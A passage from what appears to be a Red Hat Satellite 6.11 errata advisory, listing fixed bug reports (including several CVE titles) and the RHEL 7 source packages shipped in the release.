Upgrade to Red Hat Satellite 7.0 fails at db:migrate step with error "undefined local variable or method `type' for #<Katello::CdnConfiguration:0x00000000153c6198>" 2053996 - ReclaimSpace does not acquire repo lock so it can be run concurrently with the repo sync 2053997 - hammer lacks command "repository reclaim-space" 2054008 - Retain packages on Repository does not synchronize the specified number of packages on Satellite 7 2054121 - API and WebUI must disallow repo create with negative Retain package versions count 2054123 - hammer repository create ignores --retain-package-versions-count option 2054165 - After satellite-change-hostname, foreman tasks acquired lock error still refers to URL of old hostname 2054174 - Repo discovery feature cannot discover yum repositories because 'Content Default HTTP Proxy' is not used to connect to the upstream URL in Satellite 7.0 2054182 - remove pulp2 automatically on upgrade to 6.11 (If the user hasn't already done it) 2054211 - CVE-2022-23634 rubygem-puma: rubygem-rails: information leak between requests 2054340 - [SAT-4229] Module streams - basic table 2054758 - Satellite 6.10 clone is failing with user pulp doesn't exist 2054849 - CDN loading error for non-admin user and non-default org 2054971 - Enable registration by default 2055159 - Satellite/capsule 6.10 and tools 6.10 repos are listed in the Recommended Repositories for Sat 7.0 2055312 - Enabling ISO type repository fails with PG::NotNullViolation: ERROR 2055329 - Cannot import a cv 2055495 - If Kickstart 7.X repos are being synced to Capsule 7.0 then Pulp 3 tries to sync a non-existant HighAvailability and ResilientStorage repo as well and gets 404 fnot found 2055513 - Deletion of Custom repo deletes it from all versions of CV where it is included but the behavior is different for Red Hat based repos in Satellite 7.0 2055570 - Add check for LCE and CV presence in upstream server for disconnected Satellite 2055808 - Upgrading the Satellite 7.0 from Snap 8 to Snap 9 , sets the CDN configuration for all Organizations in airgapped mode 2055951 - Index content is creating duplicated errata in "katello_erratum" table after upgrading to Satellite 6.10 2056167 - [RFE] Create new content view should redirect to "Repositories" and not "Versions" tab 2056171 - [RFE] Publish new version should redirect to "Version" tab 2056172 - [RFE] Add repositories button should highlight in Content view 2056173 - [RFE] Content view filter doesn't shows "Start Date" & "End Date" tags to confirm the correct user inputs. 2056177 - [Bug] Custom subscriptions consumed and available quantity not correct in the CSV file 2056178 - [RFE] Add RHEL-8 EUS repositories under recommended repositories 2056183 - Content view filter should suggest architectures parameters in RPM rule 2056186 - After enabling the Red Hat web console feature in Satellite 7.0, the redesigned Host page does not offers any option to connect to the Web\Cockpit Console of the client system 2056189 - Remove RHEL 7 EUS repository from the Recommended Repositories list 2056198 - [RFE] "Add Content Views" button should highlight in Composite Content view 2056202 - [RFE] Promote button should be displayed in the Content view version 2056237 - [Bug] Satellite Administration Documentation is missing 2056469 - Not possible to set hostgroup parameter during hostgroup creation 2056657 - Add deprecation banners for traditional (non-SCA) subscription management 2056966 - Part of REX job fails if multiple capsules are used for the job 2057178 - CVE-2021-44568 libsolv: heap-overflows in resolve_dependencies function 2057309 - Latest Hardware version for VMware vSphere 7.0U3 is not available on Satellite 7 2057416 - rubygem-rack is obsoleted without epoch 2057605 - foreman.rpm pulls in nodejs 2057632 - Creating repo fails if there's a validation error in the first save. 2057658 - Update pulp-rpm to 3.17 2057782 - Limit sync tags parameter is displayed twice on the repositories detail page 2057848 - Inclusion of tags in limit sync tags parameter is not white listing the tags to sync 2058397 - Ensure pulp-rpm 3.17 is built for Satellite 6.11 2058532 - certs-regenerate breaks qpidd certificates, resulting in qpidd start-up failures: Couldn't find any network address to listen to 2058649 - Unable to set or unset "Discovery location" settings from UI of Satellite 7.0 but the same is partly feasible via hammer_cli. 2058711 - Ostree type is missing during repo creation. 2058844 - The foreman-protector plugin does not works for Satellite 6.11 if the OS is RHEL 8 2058863 - Everytime a host build is being submitted that somehow generates a huge traceback with error "undefined method `insights' for nil:NilClass" in Satellite 7.0 2058867 - The insights registration steps happens during host build even if the host_registration_insights parameter is set to false in Satellite 7.0 2058894 - Server fingerprints not managed properly 2058905 - Content Import does not delete version on failure 2058984 - The Satellite 7.0 beta offers the download capability of both Host and Full Host image via UI where as the support for Host image was already removed in Satellite 6.10 2059576 - non admin user with host_view permission is unable to look at old host details ui 2059985 - please update to Satellite Ansible Collection 3.3.0 2060097 - [RFE] ouia-ID for content view table 2060396 - satellite-maintain self-upgrade passes even if the next major version maintenance repository isn't available 2060512 - Update terminology for ISS 2060546 - Leapp-upgrade package installation failing with dependency on sat 7.0 2060885 - Update foreman-ansible package to 7.0.3 2061688 - old rubygems (from 6.7 and older) installed and prevent EL7 to EL8 upgrade 2061749 - Templates sync with git on RHEL8 is causing SElinux error 2061773 - Settings defined by DSL are not properly encrypted 2061970 - Mirror on sync still shows up in 'hammer repository info', while mirroring policy does not 2062189 - satellite-installer gets failed with "Could not open SSL root certificate file /root/.postgresql/root.crt" error. 2062476 - GPG shows blank on repo details page render, but is correct when selecting the dropdown 2063149 - CVE-2022-23633 rubygem-actionpack: information leak between requests 2063190 - Upgrading from Satellite 6.9 to Satellite 6.10.3 fails with error "undefined method operatingsystems' for nil:NilClass" during the db:migrate step 2063575 - [RFE] - add ouia-ID for buttons on a cv 2063910 - LEAPP upgrade fails with [Errno 2] No such file or directory: '/var/lib/leapp/scratch/mounts/root_/system_overlay/etc/pki/pulp/content/pulp-global-repo.ca' 2064400 - Migration of encrypted fields between 3.14 and 3.16 is broken for some remotes 2064410 - Incorrect file permissions in /var/lib/pulp/media/... lead to repository sync errors 2064434 - Repository set not showing repos after importing library and creating an ak in a disconnected satellite 2064583 - High memory usage of foreman-proxy during a scaled bulk REX job 2064707 - bootstrap.py can't reach the API via the capsule 2064793 - Remotes should have username and password cleared out if a user sets them to be blank 2065015 - "Sync Connect Timeout" settings takes invalid value and shows update successful but doesn't reflect the change for invalid values 2065027 - Job invocation installs all the installable errata if incorrect `Job Template` is used. 2065391 - LCE and content view label resets when trying to delete the field names in "Upstream Foreman Server" tab 2065448 - [RFE] - add ouia-ID prop to update buttons in CDN configuration 2065450 - [RFE] - add ouia-ID prop to all fields in CDN configuration 2066408 - REX SSH Key works for SSH but fails for REX on RHEL 8.5 Host 2066899 - After IP change on Tues Mar 22 Satellite manifest tasks fail with 'could not initialize proxy [org.candlepin.model.UpstreamConsumer#XXXXX] - no Session' 2067301 - hammer content-import fails with error Export version 3.14.9 of pulpcore does not match installed version 3.14.12 if the z-stream versions are different for the connected and disconnected satellite 6.10 2067331 - Upgrade to Satellite 6.9 and 6.10 fails with error "ActiveRecord::RecordInvalid: Validation failed: Remote execution features is invalid" during db:seed stage 2069135 - After restore from 6.10.2 (and older) backup to 6.10.3 candlepin is broken 2069248 - documentation links in 6.11 navigate to 7.0 instead of 6.11 2069381 - new host ui, do not navigate to task, instead navigate to job 2069456 - new host ui details,ansible roles, bug when all ansible roles are assigned 2069459 - new host ui details, edit ansible roles, when assigned, wait and not confirmed, role is unasigned automatically 2069640 - insights total risk chart network errors in new host page's overview tab 2070176 - Clicking on "Select recommendations from all pages" of host details page(insights tab) selects insights recommendations of other hosts as well. 2070177 - De-duplicate errata migration doesn't delete child records 2070242 - The satellite-maintain change with respect to 6.11 version shift 2070272 - Sync Status page does not show syncing progress bar under "Result" column when syncing a repo 2070620 - After upgrading to 6.11 ping check fails with "Some components are failing: katello_agent" 2072447 - CVE-2022-28346 Django: SQL injection in QuerySet.annotate(),aggregate() and extra() 2072459 - CVE-2022-28347 Django: SQL injection via QuerySet.explain(options) on PostgreSQL 2072530 - Improvements on foreman-maintain's self-upgrade mechanism 2073039 - LEAPP upgrade enables wrong repositories for capsules 2073124 - HTTP responses include incorrect ETag value 2073194 - Filter API/ UI doesn't return errata, package group, module stream filter rules if repository has been removed from CV 2073307 - "Selected scenario is DISABLED" errors when trying to upgrade installer packages 2073313 - "Publish" action in the drop down doesn't work 2073421 - The new host page should be disabled by default 2073468 - Bootdisk Provisioning Templates are missing description 2073469 - Discovery kexec Provisioning Template is missing description 2073470 - "Kickstart default user data" Provisioning Template contains doubled description key 2075434 - bootstrap.py fails if puppet is not enabled in Satellite 2075519 - Upgrade fails during db:migrate with PG::ForeignKeyViolation: ERROR: update or delete on table "katello_errata" violates foreign key constraint "katello_content_facet_errata_errata_id" 2075528 - OS upgrade keeps original TFTP setup preventing machines to boot from the network 2076372 - Address VCR test changes in pulp_rpm_client 3.17.5 2076684 - NullPointerException during manifest refresh 2076987 - After upgrade any foreman-rake command shows 'ErbParser' and 'RubyParser' are ignored. 2077850 - Puppet purge fails on an upgraded Satellite 2078983 - Tabbable latest version 5.3.1 is not compatible with jest dom/ JSDom without changes to PF4. 2079357 - foreman-maintain maintenance-mode status command fails with `undefined method `maintenance_mode_status?' for nil:NilClass` 2080909 - The satellite-maintain self-upgrade does not disable the non RHSM repository if it was not enabled on system 2081280 - Bootdisks are left in privatetmp of httpd 2081459 - Omit python*-pulp-ostree packages 2082076 - Settings - Like operator for name 2082241 - hammer host-collection create fails with "Too many arguments" when setting unlimited-hosts 2082505 - Omit python*-pulp-python packages 2082560 - satellite-clone missed version rename 7.0 to 6.11 2083532 - PG::ForeignKeyViolation: ERROR: update or delete on table "katello_erratum_packages" violates foreign key constraint "katello_msep_erratum_package_id_fk" on table "katello_module_stream_erratum_packages" 2084106 - satellite-change-hostname on capsule runs deprecated capsule-installer 2084624 - Unable to install 6.11 with ansible-core 2.12 2085446 - LEAPP preupgrade --target 8.6 fails to resolve conflicts for rubygem-openscap 2085528 - Change "Component content view" to "Content view" 2086101 - rhel8 repos are missing python2-qpid, making qpid-tools and thus the katello-agent support unavailable 2086683 - Actions::Candlepin::Owner::Import failing with "Entity version collision detected" 2086948 - Remove 6.11 beta branding 2087727 - Upgrade to Satellite 6.10.5.1 fails with error message "PG::NotNullViolation: ERROR: null value in column "erratum_package_id" violates not-null constraint" 2089361 - satellite-clone is broken on RHEL8.6 2089794 - Insights recommendations get halted with error undefined method `id' for nil:NilClass 2089796 - Absence of Package redhat-access-insights-puppet.noarch in rhel 8 sat/capsule 2089812 - Need to list Satellite Utils and Puppet agent repositories on Recommended Repositories page for Sat 6.11 2089928 - Dependency Issue when attempting to enable Satellite Infoblox DNS and DHCP plugins on RHEL 8 2090740 - Update links for the new puppet documentation 2090820 - satellite upgrade to 6.11 fails in installer with "Could not open SSL root certificate file /root/.postgresql/root.crt" error for external DB setup 2093679 - satellite-installer --enable-foreman-proxy-plugin-shellhooks fails with error Error: Unable to find a match: rubygem-smart_proxy_shellhooks in Red Hat Satellite 6.11 2094255 - Configure Cloud Connector runs against an old hostname after a hostname change 2094280 - rhc_instance_id is not being set correctly by configure cloud connector playbook. 2094454 - Error "missing keywords: :arch, :major, :minor" on CDN configuration 2095598 - The completion of a remediation playbook should indicate success or failure combined for all hosts in the run 2095599 - Satellite yggdrasil-forwarder-worker does not send proper lowercase JSON to RHC API 2096198 - Too many connection issue occurring for on-demand content sync 2096921 - "Reconfigure Cloud Connector" job fails on upgraded Satellite configured with fifi/receptor. 6. Package List: Red Hat Satellite 6.11 for RHEL 7: Source: ansible-collection-redhat-satellite-3.3.0-1.el7sat.src.rpm ansible-collection-redhat-satellite_operations-1.2.3-1.el7sat.src.rpm ansible-runner-1.4.7-1.el7ar.src.rpm ansiblerole-foreman_scap_client-0.2.0-2.el7sat.src.rpm ansiblerole-insights-client-1.7.1-2.el7sat.src.rpm candlepin-4.1.13-1.el7sat.src.rpm createrepo_c-0.20.0-1.el7pc.src.rpm dynflow-utils-1.6.3-1.el7sat.src.rpm foreman-3.1.1.21-2.el7sat.src.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm foreman-discovery-image-3.8.2-1.el7sat.src.rpm foreman-discovery-image-service-1.0.0-4.1.el7sat.src.rpm foreman-installer-3.1.2.6-1.el7sat.src.rpm foreman-proxy-3.1.1.1-1.el7sat.src.rpm foreman-selinux-3.1.2.1-1.el7sat.src.rpm gofer-2.12.5-7.el7sat.src.rpm hfsplus-tools-332.14-12.el7.src.rpm katello-4.3.0-3.el7sat.src.rpm katello-certs-tools-2.9.0-1.el7sat.src.rpm katello-client-bootstrap-1.7.9-1.el7sat.src.rpm katello-selinux-4.0.2-1.el7sat.src.rpm keycloak-httpd-client-install-1.2.2-2.el7sat.src.rpm libcomps-0.1.18-1.el7pc.src.rpm libmodulemd2-2.9.3-1.el7pc.src.rpm libsodium-1.0.17-3.el7sat.src.rpm libsolv-0.7.22-1.el7pc.src.rpm libsolv0-0.6.34-4.el7sat.src.rpm libwebsockets-2.4.2-2.el7.src.rpm livecd-tools-20.4-1.6.el7sat.src.rpm pcp-mmvstatsd-0.4-2.el7sat.src.rpm pulpcore-selinux-1.3.0-1.el7pc.src.rpm puppet-agent-7.12.1-1.el7sat.src.rpm puppet-agent-oauth-0.5.1-3.el7sat.src.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm puppetlabs-stdlib-5.2.0-1.el7sat.src.rpm puppetserver-7.4.2-1.el7sat.src.rpm python-daemon-2.1.2-7.2.el7sat.src.rpm python-jinja2-2.10-10.el7sat.src.rpm python-lockfile-0.11.0-10.el7ar.src.rpm python-markupsafe-0.23-21.el7sat.src.rpm python-pexpect-4.6-1.el7at.src.rpm python-psutil-5.7.2-2.el7sat.src.rpm python-ptyprocess-0.5.2-3.el7at.src.rpm python-qpid-1.35.0-5.el7.src.rpm python2-libcomps-0.1.15-5.pulp.el7sat.src.rpm qpid-cpp-1.36.0-32.el7_9amq.src.rpm qpid-dispatch-1.14.0-1.el7_9.src.rpm qpid-proton-0.33.0-6.el7_9.src.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm rh-postgresql12-postgresql-evr-0.0.2-1.el7sat.src.rpm rhel8-kickstart-setup-0.0.2-1.el7sat.src.rpm rubygem-clamp-1.1.2-7.el7sat.src.rpm rubygem-facter-2.4.1-2.el7sat.src.rpm rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm rubygem-foreman_maintain-1.0.12-1.el7sat.src.rpm rubygem-foreman_scap_client-0.5.0-1.el7sat.src.rpm rubygem-highline-2.0.3-2.el7sat.src.rpm rubygem-oauth-0.5.4-2.el7sat.src.rpm saslwrapper-0.22-5.el7sat.src.rpm satellite-6.11.0-2.el7sat.src.rpm satellite-installer-6.11.0.7-1.el7sat.src.rpm satellite-maintain-0.0.1-1.el7sat.src.rpm tfm-7.0-1.el7sat.src.rpm tfm-pulpcore-1.0-4.el7pc.src.rpm tfm-pulpcore-python-aiodns-3.0.0-2.el7pc.src.rpm tfm-pulpcore-python-aiofiles-0.7.0-2.el7pc.src.rpm tfm-pulpcore-python-aiohttp-3.8.1-2.el7pc.src.rpm tfm-pulpcore-python-aiohttp-xmlrpc-1.5.0-1.el7pc.src.rpm tfm-pulpcore-python-aioredis-2.0.0-2.el7pc.src.rpm tfm-pulpcore-python-aiosignal-1.2.0-1.el7pc.src.rpm tfm-pulpcore-python-ansible-builder-1.0.1-2.el7pc.src.rpm tfm-pulpcore-python-asgiref-3.4.1-1.el7pc.src.rpm tfm-pulpcore-python-async-lru-1.0.2-2.el7pc.src.rpm tfm-pulpcore-python-async-timeout-4.0.2-1.el7pc.src.rpm tfm-pulpcore-python-asyncio-throttle-1.0.2-2.el7pc.src.rpm tfm-pulpcore-python-attrs-21.2.0-2.el7pc.src.rpm tfm-pulpcore-python-backoff-1.11.1-1.el7pc.src.rpm tfm-pulpcore-python-bindep-2.10.1-1.el7pc.src.rpm tfm-pulpcore-python-bleach-3.3.1-1.el7pc.src.rpm tfm-pulpcore-python-bleach-allowlist-1.0.3-2.el7pc.src.rpm tfm-pulpcore-python-brotli-1.0.9-1.el7pc.src.rpm tfm-pulpcore-python-cchardet-2.1.7-1.el7pc.src.rpm tfm-pulpcore-python-certifi-2020.6.20-2.el7pc.src.rpm tfm-pulpcore-python-cffi-1.15.0-1.el7pc.src.rpm tfm-pulpcore-python-chardet-3.0.4-3.el7pc.src.rpm tfm-pulpcore-python-charset-normalizer-2.0.7-1.el7pc.src.rpm tfm-pulpcore-python-click-8.0.3-1.el7pc.src.rpm tfm-pulpcore-python-click-shell-2.1-2.el7pc.src.rpm tfm-pulpcore-python-colorama-0.4.4-2.el7pc.src.rpm tfm-pulpcore-python-contextlib2-21.6.0-2.el7pc.src.rpm tfm-pulpcore-python-cryptography-3.1.1-1.el7pc.src.rpm tfm-pulpcore-python-dateutil-2.8.2-1.el7pc.src.rpm tfm-pulpcore-python-debian-0.1.42-1.el7pc.src.rpm tfm-pulpcore-python-defusedxml-0.7.1-2.el7pc.src.rpm tfm-pulpcore-python-diff-match-patch-20200713-2.el7pc.src.rpm tfm-pulpcore-python-distro-1.6.0-2.el7pc.src.rpm tfm-pulpcore-python-django-3.2.13-1.el7pc.src.rpm tfm-pulpcore-python-django-currentuser-0.5.3-3.el7pc.src.rpm tfm-pulpcore-python-django-filter-21.1-1.el7pc.src.rpm tfm-pulpcore-python-django-guardian-2.4.0-3.el7pc.src.rpm tfm-pulpcore-python-django-guid-3.2.0-2.el7pc.src.rpm tfm-pulpcore-python-django-import-export-2.6.1-1.el7pc.src.rpm tfm-pulpcore-python-django-lifecycle-0.9.3-1.el7pc.src.rpm tfm-pulpcore-python-django-prometheus-2.1.0-2.el7pc.src.rpm tfm-pulpcore-python-django-readonly-field-1.0.5-3.el7pc.src.rpm tfm-pulpcore-python-djangorestframework-3.12.4-4.el7pc.src.rpm tfm-pulpcore-python-djangorestframework-queryfields-1.0.0-4.el7pc.src.rpm tfm-pulpcore-python-drf-access-policy-1.1.0-1.el7pc.src.rpm tfm-pulpcore-python-drf-nested-routers-0.93.3-3.el7pc.src.rpm tfm-pulpcore-python-drf-spectacular-0.20.1-1.el7pc.src.rpm tfm-pulpcore-python-dynaconf-3.1.7-2.el7pc.src.rpm tfm-pulpcore-python-ecdsa-0.13.3-3.el7pc.src.rpm tfm-pulpcore-python-et-xmlfile-1.1.0-1.el7pc.src.rpm tfm-pulpcore-python-flake8-3.9.2-3.el7pc.src.rpm tfm-pulpcore-python-frozenlist-1.3.0-1.el7pc.src.rpm tfm-pulpcore-python-future-0.18.2-4.el7pc.src.rpm tfm-pulpcore-python-galaxy-importer-0.4.1-2.el7pc.src.rpm tfm-pulpcore-python-gnupg-0.4.7-2.el7pc.src.rpm tfm-pulpcore-python-gunicorn-20.1.0-3.el7pc.src.rpm tfm-pulpcore-python-idna-3.3-1.el7pc.src.rpm tfm-pulpcore-python-idna-ssl-1.1.0-4.el7pc.src.rpm tfm-pulpcore-python-importlib-metadata-1.7.0-2.el7pc.src.rpm tfm-pulpcore-python-inflection-0.5.1-2.el7pc.src.rpm tfm-pulpcore-python-iniparse-0.4-34.el7pc.src.rpm tfm-pulpcore-python-jinja2-3.0.2-1.el7pc.src.rpm tfm-pulpcore-python-jsonschema-3.2.0-7.el7pc.src.rpm tfm-pulpcore-python-lxml-4.7.1-1.el7pc.src.rpm tfm-pulpcore-python-markdown-3.3.4-4.el7pc.src.rpm tfm-pulpcore-python-markuppy-1.14-2.el7pc.src.rpm tfm-pulpcore-python-markupsafe-2.0.1-2.el7pc.src.rpm tfm-pulpcore-python-mccabe-0.6.1-2.el7pc.src.rpm tfm-pulpcore-python-multidict-5.2.0-1.el7pc.src.rpm tfm-pulpcore-python-naya-1.1.1-1.el7pc.src.rpm tfm-pulpcore-python-odfpy-1.4.1-5.el7pc.src.rpm tfm-pulpcore-python-openpyxl-3.0.9-1.el7pc.src.rpm tfm-pulpcore-python-packaging-21.2-1.el7pc.src.rpm tfm-pulpcore-python-parsley-1.3-1.el7pc.src.rpm tfm-pulpcore-python-pbr-5.6.0-1.el7pc.src.rpm tfm-pulpcore-python-productmd-1.33-2.el7pc.src.rpm tfm-pulpcore-python-prometheus-client-0.8.0-2.el7pc.src.rpm tfm-pulpcore-python-psycopg2-2.9.1-1.el7pc.src.rpm tfm-pulpcore-python-pulp-ansible-0.10.1-1.el7pc.src.rpm tfm-pulpcore-python-pulp-certguard-1.5.1-1.el7pc.src.rpm tfm-pulpcore-python-pulp-cli-0.14.0-1.el7pc.src.rpm tfm-pulpcore-python-pulp-container-2.9.2-1.el7pc.src.rpm tfm-pulpcore-python-pulp-deb-2.16.1-1.el7pc.src.rpm tfm-pulpcore-python-pulp-file-1.10.1-1.el7pc.src.rpm tfm-pulpcore-python-pulp-rpm-3.17.5-1.1.el7pc.src.rpm tfm-pulpcore-python-pulpcore-3.16.9-1.el7pc.src.rpm tfm-pulpcore-python-pyOpenSSL-19.1.0-2.el7pc.src.rpm tfm-pulpcore-python-pycairo-1.20.1-2.el7pc.src.rpm tfm-pulpcore-python-pycares-4.1.2-3.el7pc.src.rpm tfm-pulpcore-python-pycodestyle-2.7.0-4.el7pc.src.rpm tfm-pulpcore-python-pycparser-2.20-2.el7pc.src.rpm tfm-pulpcore-python-pycryptodomex-3.11.0-1.el7pc.src.rpm tfm-pulpcore-python-pyflakes-2.3.1-4.el7pc.src.rpm tfm-pulpcore-python-pygments-2.10.0-2.el7pc.src.rpm tfm-pulpcore-python-pygobject-3.40.1-1.el7pc.src.rpm tfm-pulpcore-python-pygtrie-2.4.2-2.el7pc.src.rpm tfm-pulpcore-python-pyjwkest-1.4.2-5.el7pc.src.rpm tfm-pulpcore-python-pyjwt-1.7.1-7.el7pc.src.rpm tfm-pulpcore-python-pyparsing-2.4.7-2.el7pc.src.rpm tfm-pulpcore-python-pyrsistent-0.18.0-1.el7pc.src.rpm tfm-pulpcore-python-pytz-2021.3-1.el7pc.src.rpm tfm-pulpcore-python-pyyaml-5.4.1-3.el7pc.src.rpm tfm-pulpcore-python-redis-3.5.3-2.el7pc.src.rpm tfm-pulpcore-python-requests-2.26.0-3.el7pc.src.rpm tfm-pulpcore-python-requirements-parser-0.2.0-2.el7pc.src.rpm tfm-pulpcore-python-rhsm-1.19.2-2.el7pc.src.rpm tfm-pulpcore-python-schema-0.7.5-1.el7pc.src.rpm tfm-pulpcore-python-semantic-version-2.8.5-2.el7pc.src.rpm tfm-pulpcore-python-six-1.16.0-1.el7pc.src.rpm tfm-pulpcore-python-sqlparse-0.4.2-2.el7pc.src.rpm tfm-pulpcore-python-tablib-3.1.0-1.el7pc.src.rpm tfm-pulpcore-python-toml-0.10.2-2.el7pc.src.rpm tfm-pulpcore-python-typing-extensions-3.10.0.2-1.el7pc.src.rpm tfm-pulpcore-python-uritemplate-4.1.1-1.el7pc.src.rpm tfm-pulpcore-python-url-normalize-1.4.3-3.el7pc.src.rpm tfm-pulpcore-python-urllib3-1.26.7-1.el7pc.src.rpm tfm-pulpcore-python-urlman-1.4.0-2.el7pc.src.rpm tfm-pulpcore-python-webencodings-0.5.1-2.el7pc.src.rpm tfm-pulpcore-python-whitenoise-5.3.0-1.el7pc.src.rpm tfm-pulpcore-python-xlrd-2.0.1-4.el7pc.src.rpm tfm-pulpcore-python-xlwt-1.3.0-2.el7pc.src.rpm tfm-pulpcore-python-yarl-1.7.2-1.el7pc.src.rpm tfm-pulpcore-python-zipp-3.4.0-3.el7pc.src.rpm tfm-rubygem-actioncable-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-actionmailbox-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-actionmailer-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-actionpack-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-actiontext-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-actionview-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-activejob-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-activemodel-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-activerecord-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-activerecord-import-1.1.0-1.el7sat.src.rpm tfm-rubygem-activerecord-session_store-2.0.0-1.el7sat.src.rpm tfm-rubygem-activestorage-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-activesupport-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-acts_as_list-1.0.3-2.el7sat.src.rpm tfm-rubygem-addressable-2.8.0-1.el7sat.src.rpm tfm-rubygem-algebrick-0.7.3-8.el7sat.src.rpm tfm-rubygem-amazing_print-1.1.0-2.el7sat.src.rpm tfm-rubygem-ancestry-3.0.7-2.el7sat.src.rpm tfm-rubygem-anemone-0.7.2-23.el7sat.src.rpm tfm-rubygem-angular-rails-templates-1.1.0-2.el7sat.src.rpm tfm-rubygem-ansi-1.5.0-3.el7sat.src.rpm tfm-rubygem-apipie-bindings-0.4.0-2.el7sat.src.rpm tfm-rubygem-apipie-dsl-2.3.0-2.el7sat.src.rpm tfm-rubygem-apipie-params-0.0.5-5.1.el7sat.src.rpm tfm-rubygem-apipie-rails-0.5.17-4.el7sat.src.rpm tfm-rubygem-audited-4.9.0-4.el7sat.src.rpm tfm-rubygem-azure_mgmt_compute-0.22.0-1.el7sat.src.rpm tfm-rubygem-azure_mgmt_network-0.26.1-2.el7sat.src.rpm tfm-rubygem-azure_mgmt_resources-0.18.2-1.el7sat.src.rpm tfm-rubygem-azure_mgmt_storage-0.23.0-1.el7sat.src.rpm tfm-rubygem-azure_mgmt_subscriptions-0.18.5-1.el7sat.src.rpm tfm-rubygem-bcrypt-3.1.12-4.1.el7sat.src.rpm tfm-rubygem-builder-3.2.4-2.el7sat.src.rpm tfm-rubygem-bundler_ext-0.4.1-6.el7sat.src.rpm tfm-rubygem-clamp-1.1.2-7.el7sat.src.rpm tfm-rubygem-coffee-rails-5.0.0-2.el7sat.src.rpm tfm-rubygem-coffee-script-2.4.1-5.el7sat.src.rpm tfm-rubygem-coffee-script-source-1.12.2-5.el7sat.src.rpm tfm-rubygem-colorize-0.8.1-2.el7sat.src.rpm tfm-rubygem-concurrent-ruby-1.1.6-3.el7sat.src.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-3.el7sat.src.rpm tfm-rubygem-connection_pool-2.2.2-3.el7sat.src.rpm tfm-rubygem-crass-1.0.6-2.el7sat.src.rpm tfm-rubygem-css_parser-1.4.7-5.el7sat.src.rpm tfm-rubygem-daemons-1.2.3-7.1.el7sat.src.rpm tfm-rubygem-deacon-1.0.0-5.el7sat.src.rpm tfm-rubygem-declarative-0.0.10-3.el7sat.src.rpm tfm-rubygem-declarative-option-0.1.0-3.el7sat.src.rpm tfm-rubygem-deep_cloneable-3.0.0-4.el7sat.src.rpm tfm-rubygem-deface-1.5.3-3.el7sat.src.rpm tfm-rubygem-diffy-3.0.1-6.1.el7sat.src.rpm tfm-rubygem-domain_name-0.5.20160310-5.el7sat.src.rpm tfm-rubygem-dynflow-1.6.4-1.el7sat.src.rpm tfm-rubygem-erubi-1.9.0-2.el7sat.src.rpm tfm-rubygem-excon-0.76.0-2.el7sat.src.rpm tfm-rubygem-execjs-2.7.0-5.el7sat.src.rpm tfm-rubygem-facter-4.0.51-2.el7sat.src.rpm tfm-rubygem-faraday-0.17.3-2.el7sat.src.rpm tfm-rubygem-faraday-cookie_jar-0.0.6-2.el7sat.src.rpm tfm-rubygem-faraday_middleware-0.13.1-3.el7sat.src.rpm tfm-rubygem-fast_gettext-1.4.1-5.el7sat.src.rpm tfm-rubygem-ffi-1.12.2-2.1.el7sat.src.rpm tfm-rubygem-fog-aws-3.6.5-2.el7sat.src.rpm tfm-rubygem-fog-core-2.1.0-4.el7sat.src.rpm tfm-rubygem-fog-google-1.11.0-2.el7sat.src.rpm tfm-rubygem-fog-json-1.2.0-4.el7sat.src.rpm tfm-rubygem-fog-kubevirt-1.3.3-2.el7sat.src.rpm tfm-rubygem-fog-libvirt-0.9.0-1.el7sat.src.rpm tfm-rubygem-fog-openstack-1.0.8-4.el7sat.src.rpm tfm-rubygem-fog-ovirt-2.0.1-2.el7sat.src.rpm tfm-rubygem-fog-vsphere-3.5.1-1.el7sat.src.rpm tfm-rubygem-fog-xml-0.1.2-9.el7sat.src.rpm tfm-rubygem-foreman-tasks-5.2.3-1.el7sat.src.rpm tfm-rubygem-foreman_ansible-7.0.4.1-1.el7sat.src.rpm tfm-rubygem-foreman_azure_rm-2.2.6-1.el7sat.src.rpm tfm-rubygem-foreman_bootdisk-19.0.4.1-1.el7sat.src.rpm tfm-rubygem-foreman_discovery-19.0.4-1.el7sat.src.rpm tfm-rubygem-foreman_hooks-0.3.17-2.el7sat.src.rpm tfm-rubygem-foreman_kubevirt-0.1.9-2.el7sat.src.rpm tfm-rubygem-foreman_leapp-0.1.9-1.el7sat.src.rpm tfm-rubygem-foreman_openscap-5.1.1-1.el7sat.src.rpm tfm-rubygem-foreman_puppet-2.0.6-1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution-5.0.7-1.el7sat.src.rpm tfm-rubygem-foreman_rh_cloud-5.0.39-1.el7sat.src.rpm tfm-rubygem-foreman_templates-9.1.0-1.el7sat.src.rpm tfm-rubygem-foreman_theme_satellite-9.0.0.10-1.el7sat.src.rpm tfm-rubygem-foreman_virt_who_configure-0.5.8-1.el7sat.src.rpm tfm-rubygem-foreman_webhooks-2.0.1-1.1.el7sat.src.rpm tfm-rubygem-formatador-0.2.1-13.el7sat.src.rpm tfm-rubygem-friendly_id-5.3.0-2.el7sat.src.rpm tfm-rubygem-fx-0.5.0-2.el7sat.src.rpm tfm-rubygem-get_process_mem-0.2.7-2.1.el7sat.src.rpm tfm-rubygem-gettext_i18n_rails-1.8.0-3.el7sat.src.rpm tfm-rubygem-git-1.5.0-2.el7sat.src.rpm tfm-rubygem-gitlab-sidekiq-fetcher-0.6.0-2.el7sat.src.rpm tfm-rubygem-globalid-0.4.2-2.el7sat.src.rpm tfm-rubygem-google-api-client-0.33.2-2.el7sat.src.rpm tfm-rubygem-google-cloud-env-1.3.3-2.el7sat.src.rpm tfm-rubygem-googleauth-0.13.1-2.el7sat.src.rpm tfm-rubygem-graphql-1.8.14-3.el7sat.src.rpm tfm-rubygem-graphql-batch-0.3.10-3.el7sat.src.rpm tfm-rubygem-gssapi-1.2.0-8.el7sat.src.rpm tfm-rubygem-hammer_cli-3.1.0.1-1.el7sat.src.rpm 